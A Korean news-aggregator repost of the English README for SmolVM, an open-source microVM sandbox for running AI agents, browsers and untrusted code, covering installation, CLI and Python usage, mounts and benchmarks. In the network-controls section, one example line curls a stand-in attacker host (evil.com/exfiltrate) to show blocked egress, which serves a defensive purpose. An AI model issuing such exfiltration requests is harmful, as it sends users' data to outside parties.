HN 표시: 로컬 샌드박스에서 병렬 Pi 에이전트를 실행 중입니다.

hackernews | | 📦 오픈소스
#claude #openai #프레임워크
원문 출처: hackernews · Genesis Park에서 요약 및 분석

요약

SmolVM은 AI 에이전트가 사용할 수 있는 일회용 컴퓨터를 제공하여, 0.5초 만에 부팅되는 마이크로VM 환경을 지원합니다. 하드웨어 수준의 격리와 네트워크 제어 기능을 통해 보안을 유지하며, 파일 공유 및 실시간 제어가 가능한 브라우저 샌드박스를 포함합니다. 이를 통해 수천 개의 샌드박스를 안전하게 운영할 수 있도록 설계되었습니다.

본문

SmolVM gives AI agents their own disposable computer. Each microVM boots in milliseconds, runs any code or software you throw at it, persists files and state across sessions, and disappears when you're done — ready to handle thousands of sandboxes in production. | Feature | What it means for you | |---|---| | Sub-second boot | Your agent has a running VM before the API call returns (~500 ms). | | Hardware isolation | Each sandbox runs in its own virtual machine with hardware-level separation. Untrusted code can't escape or access your system. | | Network controls | Lock down egress to specific domains so agents can't call home. | | Browser sandbox | Agents get a full browser they can see and control in real time. | | File sharing | Share local directories with the sandbox, read-only or writable. | | Snapshots | Pause a sandbox and resume it later with everything intact. | | Coding agents | One command to launch a sandbox with Claude Code, Codex, or Pi pre-installed. | | OpenClaw | Run GUI Linux apps (IDEs, browsers, tools) inside an isolated sandbox. | - Run untrusted code safely. Execute AI-generated code in an isolated sandbox instead of on your machine. - Give agents a browser. Spin up a full browser session that agents can see and control in real time. - Let agents read your project. Mount a local directory so agents can explore your codebase inside a sandbox. - Keep state across turns. Reuse the same sandbox throughout a multi-step workflow. Install SmolVM with a single command: curl -sSL https://celesto.ai/install.sh | bash This installs everything you need (including Python), configures your machine, and verifies the setup. Manual installation pip install smolvm smolvm setup smolvm doctor On supported Linux and macOS systems, pip install smolvm also pulls in the matching smolvm-core wheel automatically. Most users do not need Rust installed. Linux may prompt for sudo during setup so it can install host dependencies and configure runtime permissions. For golden-AMI builds, two-stage deploys, pinning the Firecracker version, and other non-default install paths, see docs/installation.md. from smolvm import SmolVM vm = SmolVM() result = vm.run("echo 'Hello from the sandbox!'") print(result) vm.stop() Create a sandbox, check that it's running, then stop it: smolvm create --name my-sandbox # my-sandbox running 172.16.0.2 smolvm list # NAME STATUS IP # my-sandbox running 172.16.0.2 smolvm stop my-sandbox Open a shell inside a running sandbox: smolvm ssh my-sandbox It sucks to “press enter and accept changes” every few seconds while using coding agents. SmolVM makes it easy to isolate the agent coding environment from the host (laptops). With a single command you get a claude/codex pre-installed sandbox ready with git credential to make you build a billion dollar business without making any mistake ;) smolvm codex start # start a new environment with codex preinstalled smolvm claude start # start a new environment with claude preinstalled smolvm pi start # start a new environment with the Pi coding agent preinstalled SmolVM can also start a full browser inside a sandbox. This is useful when agents need to navigate websites, fill out forms, or take screenshots. Start a browser session with a live view you can watch in your own browser: smolvm browser start --live # Session: sess_a1b2c3 # Live view: http://localhost:6080 Open the URL to watch the browser in real time. When you're done, list and stop sessions: smolvm browser list smolvm browser stop sess_a1b2c3 See examples/browser_session.py for the Python equivalent. By default, sandboxes have full internet access. You can restrict which domains a sandbox can reach by passing internet_settings : from smolvm import SmolVM vm = SmolVM(internet_settings={ "allowed_domains": ["https://api.openai.com"], }) vm.run("curl https://api.openai.com/v1/models") # allowed vm.run("curl https://evil.com/exfiltrate") # blocked See docs/concepts/network-egress-controls.md for how it works under the hood. You can give a sandbox access to a folder on your machine. This is useful when an agent needs to work with an existing project without copying files back and forth. smolvm create --mount ~/Projects/my-app smolvm ssh my-sandbox ls /workspace # your host files appear here By default the host folder is read-only — the sandbox can read every file, but changes stay inside the sandbox and never touch the originals. If the agent creates or edits files under /workspace , those changes live only in the VM's overlay layer. Mount at a custom path, or mount multiple directories: smolvm create --mount ~/Projects/my-app:/code --mount ~/data:/mnt/data When you do want the sandbox to edit your host files, add --writable-mounts : smolvm create --mount ~/Projects/my-app --writable-mounts Every directory passed with --mount becomes writable; writes from the guest are visible on the host immediately. The flag applies to all mounts on that command, so don't pair a folder you want the sandbox to modify with one you want kept untouched. The same works from Python: from smolvm import SmolVM with SmolVM(mounts=["~/Projects/my-app"], writable_mounts=True) as vm: vm.run("echo hello > /workspace/from-sandbox.txt") You can copy one file into a running sandbox without mounting a whole folder. This is useful when an agent needs a config file, script, or small input file. # Copy a file from your machine into the sandbox. smolvm file upload my-sandbox ./prompt.txt /tmp/prompt.txt # Open a shell in the sandbox to confirm the file is there. smolvm ssh my-sandbox # Then, inside the sandbox shell: cat /tmp/prompt.txt The same works from Python: from smolvm import SmolVM vm = SmolVM.from_id("my-sandbox") vm.upload_file("./prompt.txt", "/tmp/prompt.txt") vm.close() The destination must be an absolute path inside the sandbox (starting with / ), and any existing file at that path is overwritten. | What you'll learn | Example | |---|---| | Run code in a sandbox | quickstart_sandbox.py | | Start a browser session | browser_session.py | | Pass environment variables into a sandbox | env_injection.py | These examples show how to wrap SmolVM as a tool for popular agent frameworks, so an AI model can run shell commands or drive a browser through your sandbox. | Framework | Example | |---|---| | OpenAI Agents | openai_agents_tool.py | | LangChain | langchain_tool.py | | PydanticAI — shell tool | pydanticai_tool.py | | PydanticAI — reusable sandbox across turns | pydanticai_reusable_tool.py | | PydanticAI — browser automation | pydanticai_agent_browser.py | | Computer use (click and type) | computer_use_browser.py | | What it does | Example | |---|---| | Install and run OpenClaw inside a Debian sandbox with a 4 GB root filesystem | openclaw.py | Each script shows its own pip install ... line when it needs extra packages. SmolVM automatically trusts new sandboxes on first connection to keep setup simple. This is safe for local development, but you should not expose sandbox network ports publicly without extra controls. See SECURITY.md for the full policy and scope. SmolVM ships a benchmark suite that measures the timings AI agents actually feel: cold start, time-to-interactive, pause/resume, and snapshot create/restore. It drives the public Python SDK on whichever backend is native to your host — Firecracker on Linux, QEMU on macOS. Run it locally: uv run python scripts/benchmarks/bench.py See scripts/benchmarks/README.md for flags, output format, and what each metric means. See CONTRIBUTING.md to get started. Apache 2.0 — see LICENSE for details.

Genesis Park 편집팀이 AI를 활용하여 작성한 분석입니다. 원문은 출처 링크를 통해 확인할 수 있습니다.

공유

관련 저널 읽기

전체 보기 →